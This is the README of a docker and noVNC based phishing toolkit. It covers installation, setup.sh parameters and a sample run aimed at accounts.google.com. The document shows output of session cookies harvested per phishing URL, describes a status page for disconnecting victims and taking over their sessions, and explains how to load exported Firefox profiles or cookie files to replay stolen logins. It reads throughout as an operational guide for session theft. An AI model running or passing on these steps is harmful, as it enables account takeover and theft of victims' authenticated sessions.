Another phishing toolkit which provides an docker and noVNC based infrastructure. The whole setup is based on the initial article of mrd0x and fhlipzero.
A detailed description of the setup can be found here - Another phishing tool
Install the required python modules:
pip install lz4Install the setup (which will create the required docker images):
setup.sh installThe setup offers the following parameters:
Usage: ./setup.sh -u No. Users -d Domain -t Target
-u Number of users - please note for every user a container is spawned so don't go crazy
-d Domain which is used for phishing
-t Target website which should be displayed for the user
-e Export format
-s true / false if ssl is required - if ssl is set crt and key file are needed
-c Full path to the crt file of the ssl certificate
-k Full path to the key file of the ssl certificate
-a Adjust default user agent string
-z Compress profile to zip - will be ignored if parameter -e is set
-p Additional URL parameters - if not set generic URL will be generated
A basic run looks like the following:
./setup.sh -u 4 -t https://accounts.google.com -d hello.local During the run the following overview provides a status per URL how many cookies or session informations have been gathered.
...
[-] Starting Loop to collect sessions and cookies from containers
Every 60 Seconds Cookies and Sessions are exported - Press [CTRL+C] to stop..
For the url http://hello.local/v1/oauth2/authorize?access-token=b6f13b93-1b51-41c4-b8b4-b07932a45bd6 :
- 0 cookies have been collected.
- 5 session cookies have been collected.
For the url http://hello.local/v2/oauth2/authorize?access-token=fd54dbec-c057-4f46-8657-c0283e5661d9 :
- 0 cookies have been collected.
- 5 session cookies have been collected.
For the url http://hello.local/v3/oauth2/authorize?access-token=9d606939-b805-4c65-9e98-2624de2cd431 :
- 0 cookies have been collected.
- 5 session cookies have been collected.
For the url http://hello.local/v4/oauth2/authorize?access-token=84b8d725-7e87-439e-8629-53332092b68f :
- 0 cookies have been collected.
- 5 session cookies have been collected.Please note that the tool will export all cookies / session information even when it is not related to a successfull login.
Further you can also directly interact with the tool on the status page - http(s)://%DOMAIN%:65534/status.php. There you have the possability to disconnect the user and directly take over the session.
If you are using the complete FireFox profile export, you can just call firefox with -profile like that:
On Windows:
& 'C:\Program Files\Mozilla Firefox\firefox.exe' -profile <PathToProfile>\phis1-ffprofile\
On Linux:
firefox-esr -profile <PathToProfile>/phis1-ffprofile --allow-downgrade
Everything is getting restored, including the latest site.
Please note by default you need to extract the zip archive or set the parameter -z to false. If the export format -e simple is chosen two json files will be generated which can be used with Cookiebro which is available for Firefox and Chrome.
During a run the script can be terminated with ctrl + c - all running docker container will then be deleted. To fully remove the setup run setup.sh cleanup.